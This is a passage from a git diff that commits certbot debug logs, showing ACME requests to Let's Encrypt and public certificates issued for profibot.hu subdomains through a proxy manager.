+tA0Z7qq7fta0Gl24uyuB05dqI5J1LvAzKuWdIjT1tP8qCoxSE/xpix8hX2dt3h+/ +jujUgFPFZ0EVZ0xSyBNRF3MboGZnYXFUxpNjTWPKpagDHJQmqrAcDmWJnMsFY3jS +u1igv3OefnWjSQ== +-----END CERTIFICATE----- + +2026-01-20 19:15:25,464:DEBUG:acme.client:Storing nonce: 82ktJIqY7eHcOaEYq3LR7Qbjp8jYDiH5Bm8elffdu5sD3Y94hXE +2026-01-20 19:15:25,464:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:15:25,468:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/05608df76fdab2efa09d5f63616fa5d3efd1/1: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI4Mmt0SklxWTdlSGNPYUVZcTNMUjdRYmpwOGpZRGlINUJtOGVsZmZkdTVzRDNZOTRoWEUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDU2MDhkZjc2ZmRhYjJlZmEwOWQ1ZjYzNjE2ZmE1ZDNlZmQxLzEifQ", + "signature": "Kaf32ZWngTYGaFqbgZwAD1MrDKL2t4G4Tt9zsan3rFG-y3bIPbD9Au2uQpE0GPSLZnPNOcMA2ScIqPach8G2Pa5lbWR0FVpBY3Q7zFeWiDE7xkgRyJxOy5V605eoF_HKZ9ytnzBKLB_z7iAzjXJr7ZBdvlKcX8kDWCVp8mzDcU7kuLNcEe_T334e61ehSmqopEhVKTdONIYLGFwgzFJFcfrvUYBM6Kcr3vxMLZ0MPNkSHR62XTeTQoVbQR8glu522_hVKjioWSb-TIT7t3PvlH-CY8H8k8JQNmiE0Me78cxsY4_ydXya5MObyjQI1Q4rHarBgGeKapVUkXRE6VTPKQ", + "payload": "" +} +2026-01-20 19:15:25,626:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/05608df76fdab2efa09d5f63616fa5d3efd1/1 HTTP/1.1" 200 2340 +2026-01-20 19:15:25,627:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:15:25 GMT +Content-Type: application/pem-certificate-chain +Content-Length: 2340 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="alternate" +Replay-Nonce: l5FKN_ymbE79zAxS8i7JZFZqH5seEIUqNMaJXajTNdfyD74cXqI +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +-----BEGIN CERTIFICATE----- +MIIDsDCCAzWgAwIBAgISBWCN92/asu+gnV9jYW+l0+/RMAoGCCqGSM49BAMDMDIx +CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF +ODAeFw0yNjAxMjAxODE2NTNaFw0yNjA0MjAxODE2NTJaMBoxGDAWBgNVBAMTD2Fw +cC5wcm9maWJvdC5odTB2MBAGByqGSM49AgEGBSuBBAAiA2IABGRsDDgDB75EdXI4 +HKBUmZh9nWA5V+pbJCNrQwY8kKO6mAqy6OEUrjLkj0EmUjViDDY4jzUVlSDXzcUY +ntOVl0idvolVRt63mqjqfWEzkaiO6o++oZ9LoI6xA9TPnjNHUaOCAiQwggIgMA4G +A1UdDwEB/wQEAwIHgDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYD +VR0TAQH/BAIwADAdBgNVHQ4EFgQUyhEHvbW74UVUb1a6U64Puwn69SEwHwYDVR0j +BBgwFoAUjw0TovYuftFQbDMYOF1ZjiNykcowMgYIKwYBBQUHAQEEJjAkMCIGCCsG +AQUFBzAChhZodHRwOi8vZTguaS5sZW5jci5vcmcvMBoGA1UdEQQTMBGCD2FwcC5w +cm9maWJvdC5odTATBgNVHSAEDDAKMAgGBmeBDAECATAtBgNVHR8EJjAkMCKgIKAe +hhxodHRwOi8vZTguYy5sZW5jci5vcmcvODIuY3JsMIIBCwYKKwYBBAHWeQIEAgSB +/ASB+QD3AHUAZBHEbKQS7KeJHKICLgC8q08oB9QeNSer6v7VA8l9zfAAAAGb3NVG +SwAABAMARjBEAiAP1scwpg3dQFPK+PE5MdgOhZYW4O1NxisOvuWdefHsjQIgQT/M +lQx83aa2liIP+TPphetJNB5+p43RgzGl0tKEs3kAfgClyXiSXVdGF4KHDdiJZgtc +VWSLfQBA8uwHaFHRiGkZ9wAAAZvc1Ug2AAgAAAUAL5Y8sQQDAEcwRQIhAMGCBlb/ +fDzI+IgB5zdMs5Wgfgy95SYDZA5wSzE7/HywAiAybIZk62+BKZDX23jE3njqO3sc +JcfNJHk/ypU6jk8+SjAKBggqhkjOPQQDAwNpADBmAjEA9aw+nmK+Do52PRWB/voM +JkrNKZbVULDAoXymwPysX60k7DQqTlgvne2Dg//JaiaTAjEA9lAEXUH+b+clBJi8 +2w2u4feHtxqmDpEHVRwBsD427CjO1qM5YaOA8bcyh7Gmiamz +-----END CERTIFICATE----- + +-----BEGIN CERTIFICATE----- +MIICtTCCAjugAwIBAgIQfo8UX4exWTMtf9QIK4JraTAKBggqhkjOPQQDAzBPMQsw +CQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFyY2gg +R3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMjAeFw0yNDAzMTMwMDAwMDBaFw0y +NzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNy +eXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7cS7QM +ApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHbR6ET +oMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB9TAO +BgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMBIG +A1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4jcpHK +MB8GA1UdIwQYMBaAFHxClq7eS0g7+pL4nozPbYupcjeVMDIGCCsGAQUFBwEBBCYw +JDAiBggrBgEFBQcwAoYWaHR0cDovL3gyLmkubGVuY3Iub3JnLzATBgNVHSAEDDAK +MAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDIuYy5sZW5jci5v +cmcvMAoGCCqGSM49BAMDA2gAMGUCMQClsUNJdX36GE+o2yDf7L02m3P3ElVWRLls +5ZyLYPjcNamBxRB9gZYoj24mGZtP3GkCMASZcALg6kpScomqIIjVHXRUQ500cdl4 +4n7fhxwokLo/lVlO8YyHwAi7ejTHtvw9Vg== +-----END CERTIFICATE----- + +2026-01-20 19:15:25,627:DEBUG:acme.client:Storing nonce: l5FKN_ymbE79zAxS8i7JZFZqH5seEIUqNMaJXajTNdfyD74cXqI +2026-01-20 19:15:25,629:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager +2026-01-20 19:15:25,630:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-16. +2026-01-20 19:15:25,630:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-16. +2026-01-20 19:15:25,631:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-16/cert.pem. +2026-01-20 19:15:25,632:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-16/privkey.pem. +2026-01-20 19:15:25,632:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-16/chain.pem. +2026-01-20 19:15:25,632:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-16/fullchain.pem. +2026-01-20 19:15:25,633:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-16/README. +2026-01-20 19:15:25,662:DEBUG:certbot.configuration:Var account=e417a583de478a0cfdeed332c1113068 (set by user). +2026-01-20 19:15:25,663:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user). +2026-01-20 19:15:25,663:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user). +2026-01-20 19:15:25,663:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user). +2026-01-20 19:15:25,663:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user). +2026-01-20 19:15:25,663:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user). +2026-01-20 19:15:25,664:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user). +2026-01-20 19:15:25,664:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user). +2026-01-20 19:15:25,664:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2026-01-20 19:15:25,664:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2026-01-20 19:15:25,664:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user). +2026-01-20 19:15:25,665:DEBUG:certbot.configuration:Var webroot_map={'app.profibot.hu': '/data/letsencrypt-acme-challenge'} (set by user). +2026-01-20 19:15:25,667:DEBUG:certbot._internal.display.obj:Notifying user: +Successfully received certificate. +Certificate is saved at: /etc/letsencrypt/live/npm-16/fullchain.pem +Key is saved at: /etc/letsencrypt/live/npm-16/privkey.pem +This certificate expires on 2026-04-20. +These files will be updated when the certificate renews. +2026-01-20 19:15:25,667:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS: +2026-01-20 19:15:25,667:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions. +2026-01-20 19:15:25,669:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by: + * Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate + * Donating to EFF: https://eff.org/donate-le diff --git a/proxy-manager/data/logs/letsencrypt.log.4 b/proxy-manager/data/logs/letsencrypt.log.4 new file mode 100755 index 0000000..5a042d0 --- /dev/null +++ b/proxy-manager/data/logs/letsencrypt.log.4 @@ -0,0 +1,1562 @@ +2026-01-19 23:22:56,970:DEBUG:certbot._internal.main:certbot version: 5.1.0 +2026-01-19 23:22:56,970:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot +2026-01-19 23:22:56,970:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-15', '--agree-tos', '--authenticator', 'webroot', '-m', 'kincses@gmail.com', '--preferred-challenges', 'http', '--domains', 'code.profibot.hu'] +2026-01-19 23:22:56,970:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) +2026-01-19 23:22:56,983:DEBUG:certbot._internal.log:Root logging level set at 30 +2026-01-19 23:22:56,983:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2026-01-19 23:22:56,983:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot +Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). +Interfaces: Authenticator, Plugin +Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') +Initialized: +Prep: True +2026-01-19 23:22:56,984:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None +2026-01-19 23:22:56,984:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None +2026-01-19 23:22:57,025:DEBUG:certbot._internal.main:Picked account: +2026-01-19 23:22:57,025:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. +2026-01-19 23:22:57,027:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 +2026-01-19 23:22:57,468:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 +2026-01-19 23:22:57,469:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:22:57 GMT +Content-Type: application/json +Content-Length: 1033 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "PSRwgWV9EE8": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", + "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", + "meta": { + "caaIdentities": [ + "letsencrypt.org" + ], + "profiles": { + "classic": "https://letsencrypt.org/docs/profiles#classic", + "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", + "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", + "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" + }, + "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", + "website": "https://letsencrypt.org" + }, + "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", + "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", + "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", + "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", + "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" +} +2026-01-19 23:22:57,471:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for code.profibot.hu +2026-01-19 23:22:57,491:DEBUG:acme.client:Requesting fresh nonce +2026-01-19 23:22:57,492:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. +2026-01-19 23:22:57,635:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 +2026-01-19 23:22:57,636:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:22:57 GMT +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: LJ8hB_GOY4faR1SHMpwQcFNJWMpOcotglmygVukKNrap2JeTt0w +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + + +2026-01-19 23:22:57,636:DEBUG:acme.client:Storing nonce: LJ8hB_GOY4faR1SHMpwQcFNJWMpOcotglmygVukKNrap2JeTt0w +2026-01-19 23:22:57,637:DEBUG:acme.client:JWS payload: +b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "code.profibot.hu"\n }\n ]\n}' +2026-01-19 23:22:57,650:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJMSjhoQl9HT1k0ZmFSMVNITXB3UWNGTkpXTXBPY290Z2xteWdWdWtLTnJhcDJKZVR0MHciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", + "signature": "dstUJ9pQzgmEpuyhJxBExR6YFJpPK6nwnK-DP6BT--FfgKcj2IDWHIlan-c2OTuWgm2nY9y6tX3LJ2Jkdh_Lq_WMNFPFa-fPt5ztVP9ZENby-3YkVxizvy8f6zb-KKvKhnnfZ1skd57cA5WIV1dscVBeaL1qlbetgX5LhgyGsVVqVCMrLEUcNvxZJ9g8pmxcWKvzjh23aGLIxJcz_GezwX1T0JfcXKjXQlNujFS4mSs0oVi24AgwAvdXPTk3_yELItqcuTwGuAM4tz6WWb9eWhj_hLAkCGPWK3ervC8AQCxmrZIStCaflnfm_XnWR8dcocUiZwcuwD0uDouyJ4nM-g", + "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogImNvZGUucHJvZmlib3QuaHUiCiAgICB9CiAgXQp9" +} +2026-01-19 23:22:57,919:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 350 +2026-01-19 23:22:57,920:DEBUG:acme.client:Received response: +HTTP 201 +Server: nginx +Date: Mon, 19 Jan 2026 23:22:57 GMT +Content-Type: application/json +Content-Length: 350 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/471340543716 +Replay-Nonce: H6cLU6QyxsUOuB2l86ZgzYp0NwTxl9zVvIuCsk2lmmXhZIY6_YA +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "identifiers": [ + { + "type": "dns", + "value": "code.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/471340543716" +} +2026-01-19 23:22:57,920:DEBUG:acme.client:Storing nonce: H6cLU6QyxsUOuB2l86ZgzYp0NwTxl9zVvIuCsk2lmmXhZIY6_YA +2026-01-19 23:22:57,921:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:22:57,923:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJINmNMVTZReXhzVU91QjJsODZaZ3pZcDBOd1R4bDl6VnZJdUNzazJsbW1YaFpJWTZfWUEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "mBtXA-5ORrnmkduzqJ7xwA0S2wwoyq4iay8UgNm2MN6JLQBqVuz_XXgHWOUpTxGEJ_rX5s8DZEN4134HToqzDWq8eyC3PH4pMwRhh1CFANTCcMRcUPNzxA6CfcQSner1F1KsI7ve8gc0lcBl-pRwym889R2cr2KDv9P6i5kO8npSsJq0boYB-PM3dAbw4Tmw7PPJ0tEg2PYpVmg-13B3b8IM199T8iiKTiayfKj_JlWSI8BFCGAB8DSR8bdSbLAQPvIQ5lEwY8awE_NC6TZAgb1IihXipJ9-ZqPBq9h3URbySgNOo8CiiQAocHuZm3zF1klBLRA0JyWLSZjRz5L9Gg", + "payload": "" +} +2026-01-19 23:22:58,069:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 824 +2026-01-19 23:22:58,070:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:22:57 GMT +Content-Type: application/json +Content-Length: 824 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: LJ8hB_GOzN1R-onbANi0c4LJgdws4aZ4BHwHG2i1wQQnk-P-2cQ +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/UdlK3A", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + } + ] +} +2026-01-19 23:22:58,070:DEBUG:acme.client:Storing nonce: LJ8hB_GOzN1R-onbANi0c4LJgdws4aZ4BHwHG2i1wQQnk-P-2cQ +2026-01-19 23:22:58,071:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ', 'status': 'pending', 'token': 'OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk'} +2026-01-19 23:22:58,072:INFO:certbot._internal.auth_handler:Performing the following challenges: +2026-01-19 23:22:58,072:INFO:certbot._internal.auth_handler:http-01 challenge for code.profibot.hu +2026-01-19 23:22:58,072:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. +2026-01-19 23:22:58,073:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge +2026-01-19 23:22:58,075:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk +2026-01-19 23:22:58,076:DEBUG:acme.client:JWS payload: +b'{}' +2026-01-19 23:22:58,079:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJMSjhoQl9HT3pOMVItb25iQU5pMGM0TEpnZHdzNGFaNEJId0hHMmkxd1FRbmstUC0yY1EiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2LzRnVklGQSJ9", + "signature": "b9s3Fwsb-jx3RBTU2r5qD9wvWIR5XI4AB4XvD1vAGm5PcJa9aJ1m9C_ZMR9tnygzZ9eorvgs6hyTwfCYNtk2unrhnpEQG3rk186RTAJBUmFJwLTK4aT37bRqp_KBhmg4dnbN-z03diTleW41WvQPUjNTO96BTel66oxkPjFRcp3wTRNktgf5R55SxpeqE3dPRziuIzqvmM-iBkfL0heNIMtI7NBdAiaSgTW1R_g2cJXyV_hKfouTee_v6_x71qKX0e47ZoC9OoVNpKn29RxLLLP_oyE11A2d_I-6T0OfDz4dk6fkrD9Lj5wZ-VG0qj8X0E39e9gKSu_JD5q6YwcuKA", + "payload": "e30" +} +2026-01-19 23:22:58,227:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/2906438176/645727310096/4gVIFA HTTP/1.1" 200 195 +2026-01-19 23:22:58,227:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:22:58 GMT +Content-Type: application/json +Content-Length: 195 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="up" +Location: https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA +Replay-Nonce: H6cLU6Qy0ynI5kSotgx91GAOE2FXSEcrWn7EhivXTr79ULsbtMk +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" +} +2026-01-19 23:22:58,228:DEBUG:acme.client:Storing nonce: H6cLU6Qy0ynI5kSotgx91GAOE2FXSEcrWn7EhivXTr79ULsbtMk +2026-01-19 23:22:58,229:INFO:certbot._internal.auth_handler:Waiting for verification... +2026-01-19 23:22:59,229:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:22:59,233:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJINmNMVTZReTB5bkk1a1NvdGd4OTFHQU9FMkZYU0VjclduN0VoaXZYVHI3OVVMc2J0TWsiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "VWYn-nWhXwXrdQ4h75ibfTROlPjJNWpgDAs4CwaY3llo9yDb2iyS5KMoun26k0fA6DNfpiIHaASmlKGlSU4X2pv0qqTKyoB6GmjCWoVlixSnUzI4kZ2mwT8XewZ00D0xfIlPHHB7JmmGCqIkdWhgC6MXz78dYSr4U6nlkv-iF4CM-e6eH8ZbReIQWO7so_vF_rvNxtnRinYhaLwlJ3ts7UdimUmpwFlyn1ULNKc6XgGiroKTHFWLg4zHYaywK3J3uCjP4UESVOs2EbMrzYxUGfHcVLbd5Uc2EO2qF52m-lUihO-dvbrYR5T2RBxFmkgrXm_te5ggaq6vsq8cskz0vg", + "payload": "" +} +2026-01-19 23:22:59,390:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 824 +2026-01-19 23:22:59,391:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:22:59 GMT +Content-Type: application/json +Content-Length: 824 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: H6cLU6QyXefX5vHHF-v58NaKEZpSJojltc9YVA7cdiwGYkeiToI +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/UdlK3A", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + } + ] +} +2026-01-19 23:22:59,392:DEBUG:acme.client:Storing nonce: H6cLU6QyXefX5vHHF-v58NaKEZpSJojltc9YVA7cdiwGYkeiToI +2026-01-19 23:22:59,392:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ', 'status': 'pending', 'token': 'OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk'} +2026-01-19 23:23:02,393:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:23:02,397:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJINmNMVTZReVhlZlg1dkhIRi12NThOYUtFWnBTSm9qbHRjOVlWQTdjZGl3R1lrZWlUb0kiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "jEskIM41PEZyZXvBX9bbhcAhexqgHsghlR6-49N06bxG__TaF1qOUwxuuiOwn8Yc1dIeF7UZtsJ7PFgRiPpqXALB4JdanWpNJlOxJ9Oh2fpgOQYc1lQRXLLXhhpForvkVYQ8-Zi1BTW67lAAsuDvcaSkX2cKgvfIB4gSSQc9HKc7qS9OOJ_4Nt-nw6wzYulIatM6obyJQ-cqIyQUeb_o32Qkk9D_qoSQvQdauEN9dKEelcDfZfuP8ftQ4oQdmgivaRG20cXSpNwNothIPAuRr7qGD0aXAqEJ4xuJF1HTodBpGx8rdbq4xkWBZo1c8AfGzaoUBYINcjCpXhGrrJAqXw", + "payload": "" +} +2026-01-19 